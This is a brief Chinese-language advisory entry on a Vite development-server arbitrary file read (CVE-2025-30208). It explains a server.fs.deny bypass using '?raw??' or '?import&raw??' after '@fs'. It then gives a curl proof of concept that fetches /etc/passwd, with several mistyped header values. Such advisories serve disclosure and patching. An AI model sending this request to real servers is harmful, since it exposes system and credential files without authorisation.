一、Vite开发服务器任意文件读取漏洞(CVE-2025-30208)
漏洞描述:Vite是一个现代前端构建工具,为Web项目提供更快、更精简的开发体验。它主要由两部分组成:具有热模块替换(HMR)功能的开发服务器,以及使用Rollup打包代码的构建命令。在Vite 6.2.3、6.1.2、6.0.12、5.4.15和4.5.10版本之前,用于限制访问Vite服务允许列表之外的文件的server.fs.deny功能可被绕过。通过在URL的@fs前缀后增加?raw??或?import&raw??,攻击者可以读取文件系统上的任意文件。
POC:
curl 'http://ip:port/@fs/etc/passwd?import&raw??' \
-H 'Accept:text/html,application/xhtml+xml,application/xml;q-0.9,imageawif,image/webp,image/apng,*/*;q-0.8,application/signed-exchange;v-b3;q-0.7' \
-H 'Accept-language;zh-CN;zh;q=0.9' \
-H 'Connection:keep-alive' \
-H 'Upgrade Insecure Requests:1' \
-H 'User-Agent:Mozilla/5.0 (Windows NT 10.0;Win64; x64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/134.0.0.0 Safari/537.36'